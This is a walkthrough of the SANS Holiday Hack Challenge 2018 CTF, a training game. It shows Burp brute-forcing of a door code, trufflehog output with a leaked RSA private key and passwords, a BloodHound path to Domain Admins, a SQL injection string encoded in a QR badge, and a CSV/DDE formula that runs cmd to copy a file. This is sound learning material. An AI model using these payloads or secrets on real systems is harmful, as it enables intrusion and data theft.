SANS Holiday Hack Challenge 2018

This is the walk-through solution for the Capture the Flag (CTF) challenge called “SANS Holiday Hack Challenge” from SANS (https://www.holidayhackchallenge.com/2018/). Please keep in mind that there are often many ways to successfully complete such challenge. This is only one of them. Other tools can be used to obtain the same results.

Questions

Question 1

What phrase is revealed when you answer all of the KringleCon Holiday Hack History questions? For hints on achieving this objective, please visit Bushy Evergreen and help him with the Essential Editor Skills Cranberry Pi terminal challenge.

https://www.holidayhackchallenge.com/2018/challenges/osint_challenge_windows.html

Solution

Question 1
In 2015, the Dosis siblings asked for help understanding what piece of their "Gnome in Your Home" toy?

Answer: Firmware
Answer can be found at https://www.holidayhackchallenge.com/2015/

Question 2
In 2015, the Dosis siblings disassembled the conspiracy dreamt up by which corporation?

Answer: ATNAS
Answer can be found at https://www.holidayhackchallenge.com/2015/

Question 3
In 2016, participants were sent off on a problem-solving quest based on what artifact that Santa left?

Answer: Business card
Answer can be found at https://www.holidayhackchallenge.com/2016/

Question 4
In 2016, Linux terminals at the North Pole could be accessed with what kind of computer?

Answer: Cranberry Pi
Answer can be found at https://www.holidayhackchallenge.com/2016/

Question 5
In 2017, the North Pole was being bombarded by giant objects. What were they?

Answer: Snowballs
Answer can be found at https://www.holidayhackchallenge.com/2017/

Question 6
In 2017, Sam the snowman needed help reassembling pages torn from what?

Answer: The Great Book
Answer can be found at https://www.holidayhackchallenge.com/2017/

Final answer: Happy Trails

Question 2

Who submitted (First Last) the rejected talk titled Data Loss for Rainbow Teams: A Path in the Darkness? Please analyze the CFP site to find out. For hints on achieving this objective, please visit Minty Candycane and help her with the The Name Game Cranberry Pi terminal challenge.

Solution

Using Burp Suite as a web proxy, navigate the website. Under the Target tab / Site map, right-click on the domain (https://cfp.kringlecastle.com) and choose to “Spider” this host. Under the “cfp” folder, a file named “rejected-talks.csv” will appear. Inspect the raw response to find the rejected talk:

qmt3,2,8040424,200,FALSE,FALSE,John,McClane,Director of Security,Data Loss for Rainbow Teams: A Path in the Darkness,1,11

Answer: John McClane

Question 3

The KringleCon Speaker Unpreparedness room is a place for frantic speakers to furiously complete their presentations. The room is protected by a door passcode. Upon entering the correct passcode, what message is presented to the speaker? For hints on achieving this objective, please visit Tangle Coalbox and help him with the Lethal ForensicELFication Cranberry Pi terminal challenge.

https://doorpasscoden.kringlecastle.com

Solution

  • Using Burp Suite as a web proxy, navigate the website. Click on all symbols. Under the Proxy tab / HTTP history, select the checkpass.php request, right-click and Send to Intruder.
  • Payload Positions: select Sniper as attack type, and “i=” as the varying part.
  • Payloads: Select Bruter forcer, with symbols “0123”.
  • Click Start attack

Free version of Burp Suite includes the intruder, but it is time throttled. Since the code is only 4 digits long, and there are only 4 symbols, it is working for this attack.

Length of response will be different for payload 0120.

{"success":true,"resourceId":"undefined","hash":"0273f6448d56b3aba69af76f99bdc741268244b7a187c18f855c6302ec93b703","message":"Correct guess!"}

Go back to the website and choose triangle, square, circle, triangle (0120).

Answer: Welcome unprepared speaker!

Question 4

Retrieve the encrypted ZIP file from the North Pole Git repository. What is the password to open this file? For hints on achieving this objective, please visit Wunorse Openslae and help him with Stall Mucking Report Cranberry Pi terminal challenge.

https://git.kringlecastle.com/Upatree/santas_castle_automation

Solution

Go to the git repository and search file .zip. Download it.

https://git.kringlecastle.com/Upatree/santas_castle_automation/blob/master/schematics/ventilation_diagram.zip

# Search the Git repository for secrets
trufflehog https://git.kringlecastle.com/Upatree/santas_castle_automation.git

From Trufflehog

Reason: High Entropy
Date: 2018-12-11 03:29:03
Hash: 6e754d3b0746a8e980512d010fc253cbb7c23f52
Filepath: schematics/files/dot/ssh/key.rsa
Branch: origin/master
Commit: cleaning files
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEAsvB0ov2pCU0zr9olk0P2CZw9ZDgQVcsM9t37tK+ddah7pe3z
+11wLQG9EWSCLKfFdQgaMlo+x6wRSjpzODqIAjLfvDwr3TFlCv93oYoTzwmwdHIWB
+60FxGSryDK+CPRuCcrYfQDrbpAyB/i8JrNNQHwrJsh0aF66irexFAKNIwH4a3Bzv
+tX+5Oh7zR5zwBXFT08ijP2wEfz6DPkoK0P0zHm+vmGajZ3lOZQ6wufbRBaAJYp5Y
+XnAIMwYGI1y6hiIGTSPpa4LT6j325z6jGfUqCLox2uFPByPo+HGKMvFd+MV/OE+G
+4iM6lp1HZmcZcd3ZPxEqw1VrBp/CRv0U676K9QIDAQABAoIBAF56fWsNubGSlKbV
+7J8L9B1w5C1FOMLDui2iWWM2klHsSpT6xZPBIqO72/+fIjtcGFxjLtnUNyGan6hy
+/I1XVij2eP+dT6N9QbQii69w+W9/PAOyLj2zyO578V9nT8HKA59jr65vJUdB32UB
+Gv+odxZc0M/9c6hrabOhG3HRxPj0+k29qPm4+U4bFoufaNT1a1p4Zq1ZQy0KAWuE
+WsoeXVBu5e+J2lGcTEWSNScGKkjkHtHIvQmtPOeoa6dyDjANN8nOIrCnHwY5GxKk
+eeGpffyQ3EnM7uGW09IHN6Kt3M7RVGzQPAzTt7L+Ez+dW27+nnKcSxiW6N15jW7s
+w+QmFCUCgYEA23OeCUa58xnYs/RVpfqBkRlMs/9nKJ2+55fWa1eTOl4sXTDOe3EV
+ptR48se1ynVSww3zFl8ksh1GCD3ecPawHG3WAb4MU66UDtLYYPcr5IrX6tZfsiPi
+MaXmiUjcXSZZc/+smz6Bg1C5lGA3/+mI/Rgern2LF2mEZYolOMdDyp8CgYEA0L2V
+K7qVEkSNYjelgmZF3bP/ahHJvk7ZlsVbCVTnFj3j6XU7Fng86x5lxEUiO2a2q/Id
+B1daYUHL5Kef0ZcdKTNirOwxkwHUu4l27DCgIBBVGyJMFtX4wIMW9xrp9PUl78mi
+5FJolyq9XhDELjkD1OKp6UdSXISurQqn8XFLlesCgYEArTjXDzVvxC+ruWhtTuWs
+7m7M9+vrbskNjttwmix3f4Qkeq7y3ceGsrhWfDUeDyCK4oKZVhhl695lkE3dzsc6
+fkZIvflY25kbL5RIzklssSrTgoAS65edjVkJ32XO5AxIYeL4SVaOfqvywOcubOfX
+hQhL96oLZ8CXjFr+RJIttbsCgYAc9kDtOU0XpMVNHFVte000TpYgnGk2a3BLOATC
+jbImZt3pdWeGXZZuNOB/0+vE/CJaRxR6AUe7+MoWZp+JEANuxP9q6LaUJAvlHVSP
+vstox3tXcXHHNVb3NvkHvgc6Ao2J8JsWPMzgNIDjvUXK+AQtFGnowQmPZqVpwvG8
+UTDgkwKBgEZ/OIhjkXHltomC8HMjFxSZ7/YF94aTEdgo3GNb44VlLgz4SJD4ztcz
+d2M+rIaGtrXPylHdoHrGHyDMhc8Lnh8fNNKbMFLL8Zd8sKRt92bDHR9/JO+k/PKr
+ZWwI1hlAs8o9z81481/mKgA417dFRDTT1LgRdaKiiL/H/trWepgl
+-----END RSA PRIVATE KEY-----

Reason: High Entropy
Date: 2018-12-11 03:25:45
Hash: 7f46bd5f88d0d5ac9f68ef50bebb7c52cfa67442
Filepath: schematics/for_elf_eyes_only.md
Branch: origin/master
Commit: removing file
@@ -0,0 +1,15 @@
+Our Lead InfoSec Engineer Bushy Evergreen has been noticing an increase of brute force attacks in our logs. Furthermore, Albaster discovered and published a vulnerability with our password length at the last Hacker Conference.
+
+Bushy directed our elves to change the password used to lock down our sensitive files to something stronger. Good thing he caught it before those dastardly villians did!
+
+ 
+Hopefully this is the last time we have to change our password again until next Christmas. 
+
+
+
+
+Password = 'Yippee-ki-yay'
+
+
+Change ID = '9ed54617547cfca783e0f81f8dc5c927e3d1e3'

Reason: High Entropy
Date: 2018-12-11 02:25:21
Hash: c376f995b44caf502992ddb617a34e7d38d7bbc1
Filepath: support_files/spec/support/Mstrctr.js
Branch: origin/master
Commit: support files for Santa's drone functions

@@ -1,5 +0,0 @@
-
-module.export.addNote = function () {
-      console.log('Secret Key');
-      return 'wPu4Ry8FBhckXWjCfjx5QlkRR8vcAqLBf6sgmrcjwFv0c1xjMUw1Qh+rWVQZTTRP';
- };

Answer: Yippee-ki-yay

Question 5

Using the data set contained in this SANS Slingshot Linux image, find a reliable path from a Kerberoastable user to the Domain Admins group. What’s the user’s logon name (in username@domain.tld format)? Remember to avoid RDP as a control path as it depends on separate local privilege escalation flaws. For hints on achieving this objective, please visit Holly Evergreen and help her with the CURLing Master Cranberry Pi terminal challenge.

https://download.holidayhackchallenge.com/HHC2018-DomainHack_2018-12-19.ova

Solution

Double-click on the SANS Sligngshot Linux image file provided and import the virtual machine into VirtualBox. The OS should be set to Debian 64-bit (and NOT 32-bit like the suggested setting).

Use Bloodhound to find interaction between AD users

On the Desktop of SANS Slingshot Linux image, double-click on Bloodhound
Log in with pre-filled password.
You will see a graph with user accounts and domain admins@AD.KRINGLECASTLE.COM

Click on the icon on the left of the search bar.
Click on Queries (beside Node Info)
Click Find Shortest Paths to Domain Admins from Kerberoastable Users
Select Domain Admin group ADMINS@AD.KRINGLECASTLE.COM
From the graph, we can see user LDUBEJ00320@AD.KRINGLECASTLE.COM has the shortest path (exclude the ones with "Can RDP" since it was part of the question)

Answer: LDUBEJ00320@AD.KRINGLECASTLE.COM

Question 6

Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available. What is the access control number revealed by the door authentication panel? For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.

https://www.holidayhackchallenge.com/2018/challenges/alabaster_badge.jpg

Solution

Perform a SQL injection the QR code

# Scanning sample badge 
oRfjg5uGHmbduj2m

# Generate badge with SQL injection
# Go to online QR code generator and enter text
# https://www.the-qrcode-generator.com/
}' or enabled=1 or 'a'='

# Save image file

Answer: 19880715

Question 7

Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website and fetch the document C:\candidate_evaluation.docx. Which terrorist organization is secretly supported by the job applicant whose name begins with “K.” For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.

https://careers.kringlecastle.com/

Solution

CSV injection, create a CSV file with the following content and download the file at https://careers.kringlecastle.com/public/lisandre.docx

This is interpreted as a formula and will copy the file to a public directory

=cmd|'/C copy C:\\candidate_evaluation.docx C:\\careerportal\\resources\\public\\lisandre.docx'!A0
Line2
Line3

Answer: Fancy Beaver

Question 8

Santa has introduced a web-based packet capture and analysis tool at https://packalyzer.kringlecastle.com to support the elves and their information security work. Using the system, access and decrypt HTTP/2 network activity. What is the name of the song described in the document sent from Holly Evergreen to Alabaster Snowball? For hints on achieving this objective, please visit SugarPlum Mary and help her with the Python Escape from LA Cranberry Pi terminal challenge.

Solution

First, register to Packalyzer at https://packalyzer.kringlecastle.com

Log in Packalyzer
Inspect code of https://packalyzer.kringlecastle.com
Search "server-side" (from hint from Pi Terminal Challenge)
You will find comment about app.js:
//File upload Function. All extensions and sizes are validated server-side in app.js

We can see a lot of JS files are in
https://packalyzer.kringlecastle.com:80/pub/js

By playing with the URL, the file app.js is at
https://packalyzer.kringlecastle.com/pub/app.js

From looking at app.js, we find this interesting code:
const key_log_path = ( !dev_mode || __dirname + process.env.DEV + process.env.SSLKEYLOGFILE )
const options = {
  key: fs.readFileSync(__dirname + '/keys/server.key'),
  cert: fs.readFileSync(__dirname + '/keys/server.crt'),
  http2: {
    protocol: 'h2',         // HTTP2 only. NOT HTTP1 or HTTP1.1
    protocols: [ 'h2' ],
  },
  keylog : key_log_path     //used for dev mode to view traffic. Stores a few minutes worth at a time
};

function load_envs() {
  var dirs = []
  var env_keys = Object.keys(process.env)
  for (var i=0; i < env_keys.length; i++) {
    if (typeof process.env[env_keys[i]] === "string" ) {
      dirs.push(( "/"+env_keys[i].toLowerCase()+'/*') )
    }
  }
  return uniqueArray(dirs)
}
if (dev_mode) {
    //Can set env variable to open up directories during dev
    const env_dirs = load_envs();
} else {
    const env_dirs = ['/pub/','/uploads/'];
}

Go to
https://packalyzer.kringlecastle.com/sslkeylogfile/
Will give this error
Error: ENOENT: no such file or directory, open '/opt/http2packalyzer_clientrandom_ssl.log/'

So process.env.SSLKEYLOGFILE=/opt/http2packalyzer_clientrandom_ssl.log

https://packalyzer.kringlecastle.com/dev exists, and we can play with the path to find the keys. Error messages display a double slash (//) inside the path from where the path does not exist (example /dev//thisdoesnotexist).

Keys not found yet, no time to complete this challenge

Click Sniff traffic
Click Captures, Download pcap
Open pcap file with Wireshark
Specify the key file previously found in the SSL protocol in Wireshark.
Inspect the traffic

Answer: Challenge not completed ;(

Question 9+

Since I am an elf with a kid and limited time during the holidays, I can only guess who is the mastermind behind the whole KringleCon plan. I would say it is Santa himself. Big guys with beards always look suspicious anyway. Also, giving away presents to everybody looks like basic social engineering techniques to me.

UPDATE: It was Santa… 🙂

Elves’ Cranberry Pi Terminal Challenges